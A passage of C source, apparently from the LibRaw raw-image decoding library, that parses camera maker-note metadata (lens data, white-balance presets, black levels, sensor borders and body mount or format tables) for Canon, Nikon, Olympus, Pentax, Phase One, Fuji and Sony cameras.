imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(2.0f, (float)LensData[i + 5] / 24.0f);
}
imgdata.lens.nikon.NikonMCUVersion = LensData[i + 6];
if (i != 2)
{
if ((LensData[i - 1]) &&
(fabsf(imgdata.lens.makernotes.CurFocal) < 1.1f))
imgdata.lens.makernotes.CurFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i - 1] / 24.0f);
if (LensData[i + 7]) imgdata.lens.nikon.NikonEffectiveMaxAp = libraw_powf64(2.0f, (float)LensData[i + 7] / 24.0f);
}
imgdata.lens.makernotes.LensID =
(unsigned long long) LensData[i] << 56 |
(unsigned long long) LensData[i + 1] << 48 |
(unsigned long long) LensData[i + 2] << 40 |
(unsigned long long) LensData[i + 3] << 32 |
(unsigned long long) LensData[i + 4] << 24 |
(unsigned long long) LensData[i + 5] << 16 |
(unsigned long long) LensData[i + 6] << 8 |
(unsigned long long) imgdata.lens.nikon.NikonLensType;
}
else if ((len == 459) || (len == 590))
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 390, 64);
}
else if (len == 509)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 391, 64);
}
else if (len == 879)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 680, 64);
}
return;
}
void CLASS setOlympusBodyFeatures (unsigned long long id)
{
imgdata.lens.makernotes.CamID = id;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-300
((id & 0x00ffff0000ULL) == 0x0030300000ULL))
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FT;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-330
((id >= 0x5330303033ULL) && (id <= 0x5330303138ULL)) || // E-330 to E-520
(id == 0x5330303233ULL) || // E-620
(id == 0x5330303239ULL) || // E-450
(id == 0x5330303330ULL) || // E-600
(id == 0x5330303333ULL)) // E-5
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FT;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_mFT;
}
}
else
{
imgdata.lens.makernotes.LensMount =
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS parseCanonMakernotes (unsigned tag, unsigned type, unsigned len) {
if (tag == 0x0001) Canon_CameraSettings();
else if (tag == 0x0002) // focal length
{
imgdata.lens.makernotes.FocalType = get2();
imgdata.lens.makernotes.CurFocal = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
}
else if (tag == 0x0004) // shot info
{
short tempAp;
fseek(ifp, 30, SEEK_CUR);
imgdata.other.FlashEC = _CanonConvertEV((signed short)get2());
fseek(ifp, 8-32, SEEK_CUR);
if ((tempAp = get2()) != 0x7fff)
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(tempAp);
if (imgdata.lens.makernotes.CurAp < 0.7f)
{
fseek(ifp, 32, SEEK_CUR);
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(get2());
}
if (!aperture) aperture = imgdata.lens.makernotes.CurAp;
}
else if (tag == 0x0095 && // lens model tag
!imgdata.lens.makernotes.Lens[0])
{
fread(imgdata.lens.makernotes.Lens, 2, 1, ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
if (imgdata.lens.makernotes.Lens[0] < 65) // non-Canon lens
fread(imgdata.lens.makernotes.Lens + 2, 62, 1, ifp);
else
{
char efs[2];
imgdata.lens.makernotes.LensFeatures_pre[0] = imgdata.lens.makernotes.Lens[0];
imgdata.lens.makernotes.LensFeatures_pre[1] = imgdata.lens.makernotes.Lens[1];
fread(efs, 2, 1, ifp);
if (efs[0] == 45 && (efs[1] == 83 || efs[1] == 69 || efs[1] == 77))
{ // "EF-S, TS-E, MP-E, EF-M" lenses
imgdata.lens.makernotes.Lens[2] = imgdata.lens.makernotes.LensFeatures_pre[2] = efs[0];
imgdata.lens.makernotes.Lens[3] = imgdata.lens.makernotes.LensFeatures_pre[3] = efs[1];
imgdata.lens.makernotes.Lens[4] = 32;
if (efs[1] == 83)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
else if (efs[1] == 77)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
}
}
else
{ // "EF" lenses
imgdata.lens.makernotes.Lens[2] = 32;
imgdata.lens.makernotes.Lens[3] = efs[0];
imgdata.lens.makernotes.Lens[4] = efs[1];
}
fread(imgdata.lens.makernotes.Lens + 5, 58, 1, ifp);
}
}
else if (tag == 0x00a9)
{
long int save1 = ftell(ifp);
fseek (ifp, save1+(0x5<<1), SEEK_SET);
Canon_WBpresets(0,0);
fseek (ifp, save1, SEEK_SET);
}
else if (tag == 0x00e0) // sensor info
{
      imgdata.makernotes.canon.SensorWidth = (get2(),get2());   /* comma operator: skip one 16-bit value, keep the next */
      imgdata.makernotes.canon.SensorHeight = get2();
      imgdata.makernotes.canon.SensorLeftBorder = (get2(),get2(),get2()); /* skip two values, keep the third */
imgdata.makernotes.canon.SensorTopBorder = get2();
imgdata.makernotes.canon.SensorRightBorder = get2();
imgdata.makernotes.canon.SensorBottomBorder = get2();
imgdata.makernotes.canon.BlackMaskLeftBorder = get2();
imgdata.makernotes.canon.BlackMaskTopBorder = get2();
imgdata.makernotes.canon.BlackMaskRightBorder = get2();
imgdata.makernotes.canon.BlackMaskBottomBorder = get2();
}
else if (tag == 0x4001 && len > 500)
{
int c;
long int save1 = ftell(ifp);
switch (len)
{
case 582:
imgdata.makernotes.canon.CanonColorDataVer = 1; // 20D / 350D
{
fseek (ifp, save1+(0x23<<1), SEEK_SET);
Canon_WBpresets(2,2);
fseek (ifp, save1+(0x4b<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 653:
imgdata.makernotes.canon.CanonColorDataVer = 2; // 1Dmk2 / 1DsMK2
{
fseek (ifp, save1+(0x27<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa4<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 796:
imgdata.makernotes.canon.CanonColorDataVer = 3; // 1DmkIIN / 5D / 30D / 400D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x4e<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0c4<<1), SEEK_SET); // offset 196 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
// 1DmkIII / 1DSmkIII / 1DmkIV / 5DmkII
// 7D / 40D / 50D / 60D / 450D / 500D
// 550D / 1000D / 1100D
case 674: case 692: case 702: case 1227: case 1250:
case 1251: case 1337: case 1338: case 1346:
imgdata.makernotes.canon.CanonColorDataVer = 4;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x53<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa8<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0e7<<1), SEEK_SET); // offset 231 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if ((imgdata.makernotes.canon.CanonColorDataSubVer == 4)
|| (imgdata.makernotes.canon.CanonColorDataSubVer == 5))
{
fseek (ifp, save1+(0x2b9<<1), SEEK_SET); // offset 697 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if ((imgdata.makernotes.canon.CanonColorDataSubVer == 6) ||
(imgdata.makernotes.canon.CanonColorDataSubVer == 7))
{
fseek (ifp, save1+(0x2d0<<1), SEEK_SET); // offset 720 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if (imgdata.makernotes.canon.CanonColorDataSubVer == 9)
{
fseek (ifp, save1+(0x2d4<<1), SEEK_SET); // offset 724 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
case 5120:
	imgdata.makernotes.canon.CanonColorDataVer = 5; // PowerShot G10, G12, G5 X, EOS M3, EOS M5
{
fseek (ifp, save1+(0x56<<1), SEEK_SET);
if ((unique_id == 0x03970000) || // G7 X Mark II
(unique_id == 0x80000394)) // EOS M5
{
fseek(ifp, 18, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
fseek(ifp, 8, SEEK_CUR);
Canon_WBpresets(8,24);
fseek(ifp, 168, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ (c >> 1)] = get2();
fseek(ifp, 24, SEEK_CUR);
Canon_WBCTpresets (2); // BCADT
fseek(ifp, 6, SEEK_CUR);
}
else
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
get2();
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xba<<1), SEEK_SET);
Canon_WBCTpresets (2); // BCADT
fseek (ifp, save1+(0x108<<1), SEEK_SET); // offset 264 short
}
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
case 1273: case 1275:
imgdata.makernotes.canon.CanonColorDataVer = 6; // 600D / 1200D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x67<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xbc<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0fb<<1), SEEK_SET); // offset 251 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
fseek (ifp, save1+(0x1e4<<1), SEEK_SET); // offset 484 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
break;
// 1DX / 5DmkIII / 6D / 100D / 650D / 700D / EOS M / 7DmkII / 750D / 760D
case 1312: case 1313: case 1316: case 1506:
imgdata.makernotes.canon.CanonColorDataVer = 7;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x80<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xd5<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x114<<1), SEEK_SET); // offset 276 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 10)
{
fseek (ifp, save1+(0x1fd<<1), SEEK_SET); // offset 509 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
} else if (imgdata.makernotes.canon.CanonColorDataSubVer == 11)
{
fseek (ifp, save1+(0x2dd<<1), SEEK_SET); // offset 733 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
// 5DS / 5DS R / 80D / 1300D / 5D4
case 1560: case 1592: case 1353:
imgdata.makernotes.canon.CanonColorDataVer = 8;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x107<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x146<<1), SEEK_SET); // offset 326 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 14) // 1300D
{
fseek (ifp, save1+(0x231<<1), SEEK_SET);
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else
{
fseek (ifp, save1+(0x30f<<1), SEEK_SET); // offset 783 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
}
fseek (ifp, save1, SEEK_SET);
}
}
void CLASS setPentaxBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
switch (id) {
case 0x12994:
case 0x12aa2:
case 0x12b1a:
case 0x12b60:
case 0x12b62:
case 0x12b7e:
case 0x12b80:
case 0x12b9c:
case 0x12b9d:
case 0x12ba2:
case 0x12c1e:
case 0x12c20:
case 0x12cd2:
case 0x12cd4:
case 0x12cfa:
case 0x12d72:
case 0x12d73:
case 0x12db8:
case 0x12dfe:
case 0x12e6c:
case 0x12e76:
case 0x12ef8:
case 0x12f52:
case 0x12f70:
case 0x12f71:
case 0x12fb6:
case 0x12fc0:
case 0x12fca:
case 0x1301a:
case 0x13024:
case 0x1309c:
case 0x13222:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
break;
case 0x13092:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
break;
case 0x12e08:
case 0x13010:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_MF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_MF;
break;
case 0x12ee4:
case 0x12f66:
case 0x12f7a:
case 0x1302e:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_Q;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_Q;
break;
default:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS PentaxISO (ushort c)
{
int code [] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 50, 100, 200, 400, 800, 1600, 3200, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278};
double value [] = {50, 64, 80, 100, 125, 160, 200, 250, 320, 400, 500, 640, 800, 1000, 1250, 1600, 2000, 2500, 3200, 4000, 5000, 6400, 8000, 10000, 12800, 16000, 20000, 25600, 32000, 40000, 51200, 64000, 80000, 102400, 128000, 160000, 204800, 50, 100, 200, 400, 800, 1600, 3200, 50, 70, 100, 140, 200, 280, 400, 560, 800, 1100, 1600, 2200, 3200, 4500, 6400, 9000, 12800, 18000, 25600, 36000, 51200};
#define numel (sizeof(code)/sizeof(code[0]))
int i;
for (i = 0; i < numel; i++) {
if (code[i] == c) {
iso_speed = value[i];
return;
}
}
if (i == numel) iso_speed = 65535.0f;
}
#undef numel
void CLASS PentaxLensInfo (unsigned id, unsigned len) // tag 0x0207
{
ushort iLensData = 0;
uchar *table_buf;
table_buf = (uchar*)malloc(MAX(len,128));
fread(table_buf, len, 1, ifp);
if ((id < 0x12b9c) ||
(((id == 0x12b9c) || // K100D
(id == 0x12b9d) || // K110D
(id == 0x12ba2)) && // K100D Super
((!table_buf[20] ||
(table_buf[20] == 0xff)))))
{
iLensData = 3;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
(((unsigned)table_buf[0]) << 8) + table_buf[1];
}
else switch (len)
{
case 90: // LensInfo3
iLensData = 13;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 91: // LensInfo4
iLensData = 12;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 80: // LensInfo5
case 128:
iLensData = 15;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[4]) <<8) + table_buf[5];
break;
default:
if (id >= 0x12b9c) // LensInfo2
{
iLensData = 4;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[0] & 0x0f) + table_buf[2]) <<8) + table_buf[3];
}
}
if (iLensData)
{
if (table_buf[iLensData+9] &&
(fabs(imgdata.lens.makernotes.CurFocal) < 0.1f))
imgdata.lens.makernotes.CurFocal =
10*(table_buf[iLensData+9]>>2) * libraw_powf64(4, (table_buf[iLensData+9] & 0x03)-2);
if (table_buf[iLensData+10] & 0xf0)
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0xf0) >>4)/4.0f);
if (table_buf[iLensData+10] & 0x0f)
imgdata.lens.makernotes.MinAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0x0f) + 10)/4.0f);
if (iLensData != 12)
{
switch (table_buf[iLensData] & 0x06)
{
case 0: imgdata.lens.makernotes.MinAp4MinFocal = 22.0f; break;
case 2: imgdata.lens.makernotes.MinAp4MinFocal = 32.0f; break;
case 4: imgdata.lens.makernotes.MinAp4MinFocal = 45.0f; break;
case 6: imgdata.lens.makernotes.MinAp4MinFocal = 16.0f; break;
}
if (table_buf[iLensData] & 0x70)
imgdata.lens.makernotes.LensFStops =
((float)(((table_buf[iLensData] & 0x70) >> 4) ^ 0x07)) / 2.0f + 5.0f;
imgdata.lens.makernotes.MinFocusDistance = (float)(table_buf[iLensData+3] & 0xf8);
imgdata.lens.makernotes.FocusRangeIndex = (float)(table_buf[iLensData+3] & 0x07);
if ((table_buf[iLensData+14] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+14] & 0x7f) -1)/32.0f);
}
else if ((id != 0x12e76) && // K-5
(table_buf[iLensData+15] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
{
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+15] & 0x7f) -1)/32.0f);
}
}
free(table_buf);
return;
}
void CLASS setPhaseOneFeatures (unsigned id) {
ushort i;
static const struct {
ushort id;
char t_model[32];
} p1_unique[] = {
// Phase One section:
{1, "Hasselblad V"},
{10, "PhaseOne/Mamiya"},
{12, "Contax 645"},
{16, "Hasselblad V"},
{17, "Hasselblad V"},
{18, "Contax 645"},
{19, "PhaseOne/Mamiya"},
{20, "Hasselblad V"},
{21, "Contax 645"},
{22, "PhaseOne/Mamiya"},
{23, "Hasselblad V"},
{24, "Hasselblad H"},
{25, "PhaseOne/Mamiya"},
{32, "Contax 645"},
{34, "Hasselblad V"},
{35, "Hasselblad V"},
{36, "Hasselblad H"},
{37, "Contax 645"},
{38, "PhaseOne/Mamiya"},
{39, "Hasselblad V"},
{40, "Hasselblad H"},
{41, "Contax 645"},
{42, "PhaseOne/Mamiya"},
{44, "Hasselblad V"},
{45, "Hasselblad H"},
{46, "Contax 645"},
{47, "PhaseOne/Mamiya"},
{48, "Hasselblad V"},
{49, "Hasselblad H"},
{50, "Contax 645"},
{51, "PhaseOne/Mamiya"},
{52, "Hasselblad V"},
{53, "Hasselblad H"},
{54, "Contax 645"},
{55, "PhaseOne/Mamiya"},
{67, "Hasselblad V"},
{68, "Hasselblad H"},
{69, "Contax 645"},
{70, "PhaseOne/Mamiya"},
{71, "Hasselblad V"},
{72, "Hasselblad H"},
{73, "Contax 645"},
{74, "PhaseOne/Mamiya"},
{76, "Hasselblad V"},
{77, "Hasselblad H"},
{78, "Contax 645"},
{79, "PhaseOne/Mamiya"},
{80, "Hasselblad V"},
{81, "Hasselblad H"},
{82, "Contax 645"},
{83, "PhaseOne/Mamiya"},
{84, "Hasselblad V"},
{85, "Hasselblad H"},
{86, "Contax 645"},
{87, "PhaseOne/Mamiya"},
{99, "Hasselblad V"},
{100, "Hasselblad H"},
{101, "Contax 645"},
{102, "PhaseOne/Mamiya"},
{103, "Hasselblad V"},
{104, "Hasselblad H"},
{105, "PhaseOne/Mamiya"},
{106, "Contax 645"},
{112, "Hasselblad V"},
{113, "Hasselblad H"},
{114, "Contax 645"},
{115, "PhaseOne/Mamiya"},
{131, "Hasselblad V"},
{132, "Hasselblad H"},
{133, "Contax 645"},
{134, "PhaseOne/Mamiya"},
{135, "Hasselblad V"},
{136, "Hasselblad H"},
{137, "Contax 645"},
{138, "PhaseOne/Mamiya"},
{140, "Hasselblad V"},
{141, "Hasselblad H"},
{142, "Contax 645"},
{143, "PhaseOne/Mamiya"},
{148, "Hasselblad V"},
{149, "Hasselblad H"},
{150, "Contax 645"},
{151, "PhaseOne/Mamiya"},
{160, "A-250"},
{161, "A-260"},
{162, "A-280"},
{167, "Hasselblad V"},
{168, "Hasselblad H"},
{169, "Contax 645"},
{170, "PhaseOne/Mamiya"},
{172, "Hasselblad V"},
{173, "Hasselblad H"},
{174, "Contax 645"},
{175, "PhaseOne/Mamiya"},
{176, "Hasselblad V"},
{177, "Hasselblad H"},
{178, "Contax 645"},
{179, "PhaseOne/Mamiya"},
{180, "Hasselblad V"},
{181, "Hasselblad H"},
{182, "Contax 645"},
{183, "PhaseOne/Mamiya"},
{208, "Hasselblad V"},
{211, "PhaseOne/Mamiya"},
{448, "Phase One 645AF"},
{457, "Phase One 645DF"},
{471, "Phase One 645DF+"},
{704, "Phase One iXA"},
{705, "Phase One iXA - R"},
{706, "Phase One iXU 150"},
{707, "Phase One iXU 150 - NIR"},
{708, "Phase One iXU 180"},
{721, "Phase One iXR"},
// Leaf section:
{333,"Mamiya"},
{329,"Universal"},
{330,"Hasselblad H1/H2"},
{332,"Contax"},
{336,"AFi"},
{327,"Mamiya"},
{324,"Universal"},
{325,"Hasselblad H1/H2"},
{326,"Contax"},
{335,"AFi"},
{340,"Mamiya"},
{337,"Universal"},
{338,"Hasselblad H1/H2"},
{339,"Contax"},
{323,"Mamiya"},
{320,"Universal"},
{322,"Hasselblad H1/H2"},
{321,"Contax"},
{334,"AFi"},
{369,"Universal"},
{370,"Mamiya"},
{371,"Hasselblad H1/H2"},
{372,"Contax"},
{373,"Afi"},
};
imgdata.lens.makernotes.CamID = id;
if (id && !imgdata.lens.makernotes.body[0]) {
for (i=0; i < sizeof p1_unique / sizeof *p1_unique; i++)
if (id == p1_unique[i].id) {
strcpy(imgdata.lens.makernotes.body,p1_unique[i].t_model);
}
}
return;
}
void CLASS parseFujiMakernotes (unsigned tag, unsigned type) {
switch (tag) {
case 0x1002: imgdata.makernotes.fuji.WB_Preset = get2(); break;
case 0x1011: imgdata.other.FlashEC = getreal(type); break;
case 0x1020: imgdata.makernotes.fuji.Macro = get2(); break;
case 0x1021: imgdata.makernotes.fuji.FocusMode = get2(); break;
case 0x1022: imgdata.makernotes.fuji.AFMode = get2(); break;
case 0x1023: imgdata.makernotes.fuji.FocusPixel[0] = get2();
imgdata.makernotes.fuji.FocusPixel[1] = get2();
break;
case 0x1034: imgdata.makernotes.fuji.ExrMode = get2(); break;
case 0x1050: imgdata.makernotes.fuji.ShutterType = get2(); break;
case 0x1400: imgdata.makernotes.fuji.FujiDynamicRange = get2(); break;
case 0x1401: imgdata.makernotes.fuji.FujiFilmMode = get2(); break;
case 0x1402: imgdata.makernotes.fuji.FujiDynamicRangeSetting = get2(); break;
case 0x1403: imgdata.makernotes.fuji.FujiDevelopmentDynamicRange = get2(); break;
case 0x140b: imgdata.makernotes.fuji.FujiAutoDynamicRange = get2(); break;
case 0x1404: imgdata.lens.makernotes.MinFocal = getreal(type); break;
case 0x1405: imgdata.lens.makernotes.MaxFocal = getreal(type); break;
case 0x1406: imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type); break;
case 0x1407: imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type); break;
case 0x1422: imgdata.makernotes.fuji.ImageStabilization[0] = get2();
imgdata.makernotes.fuji.ImageStabilization[1] = get2();
imgdata.makernotes.fuji.ImageStabilization[2] = get2();
imgdata.shootinginfo.ImageStabilization = (imgdata.makernotes.fuji.ImageStabilization[0]<<9) + imgdata.makernotes.fuji.ImageStabilization[1];
break;
case 0x1431: imgdata.makernotes.fuji.Rating = get4(); break;
case 0x3820: imgdata.makernotes.fuji.FrameRate = get2(); break;
case 0x3821: imgdata.makernotes.fuji.FrameWidth = get2(); break;
case 0x3822: imgdata.makernotes.fuji.FrameHeight = get2(); break;
}
return;
}
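// setSonyBodyFeatures(): maps the Sony ModelID to sensor format (FF / 1" / APS-C),
// camera mount (E, Minolta A, fixed lens) and body series (ILCE / NEX / DSLR / SLT / ILCA / DSC)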
void CLASS setSonyBodyFeatures (unsigned id) {
imgdata.lens.makernotes.CamID = id;
if ( // FF cameras
(id == 257) || // a900
(id == 269) || // a850
(id == 340) || // ILCE-7M2
(id == 318) || // ILCE-7S
(id == 350) || // ILCE-7SM2
(id == 311) || // ILCE-7R
(id == 347) || // ILCE-7RM2
(id == 306) || // ILCE-7
(id == 298) || // DSC-RX1
(id == 299) || // NEX-VG900
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 354) || // ILCA-99M2
      (id == 294)    // SLT-A99, Hasselblad HV
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
else if ((id == 297) || // DSC-RX100
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
else if (id != 002) // DSC-R1
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
}
if ( // E-mount cameras, ILCE series
(id == 302) ||
(id == 306) ||
(id == 311) ||
(id == 312) ||
(id == 313) ||
(id == 318) ||
(id == 339) ||
(id == 340) ||
(id == 346) ||
(id == 347) ||
(id == 350) ||
(id == 360)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCE;
}
else if ( // E-mount cameras, NEX series
(id == 278) ||
(id == 279) ||
(id == 284) ||
(id == 288) ||
(id == 289) ||
(id == 290) ||
(id == 293) ||
(id == 295) ||
(id == 296) ||
(id == 299) ||
(id == 300) ||
(id == 305) ||
(id == 307)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_NEX;
}
else if ( // A-mount cameras, DSLR series
(id == 256) ||
(id == 257) ||
(id == 258) ||
(id == 259) ||
(id == 260) ||
(id == 261) ||
(id == 262) ||
(id == 263) ||
(id == 264) ||
(id == 265) ||
(id == 266) ||
(id == 269) ||
(id == 270) ||
(id == 273) ||
(id == 274) ||
(id == 275) ||
(id == 282) ||
(id == 283)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSLR;
}
else if ( // A-mount cameras, SLT series
(id == 280) ||
(id == 281) ||
(id == 285) ||
(id == 286) ||
(id == 287) ||
(id == 291) ||
(id == 292) ||
(id == 294) ||
(id == 303)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_SLT;
}
else if ( // A-mount cameras, ILCA series
(id == 319) ||
(id == 353) ||
(id == 354)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCA;
}
else if ( // DSC
(id == 002) || // DSC-R1
(id == 297) || // DSC-RX100
(id == 298) || // DSC-RX1
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
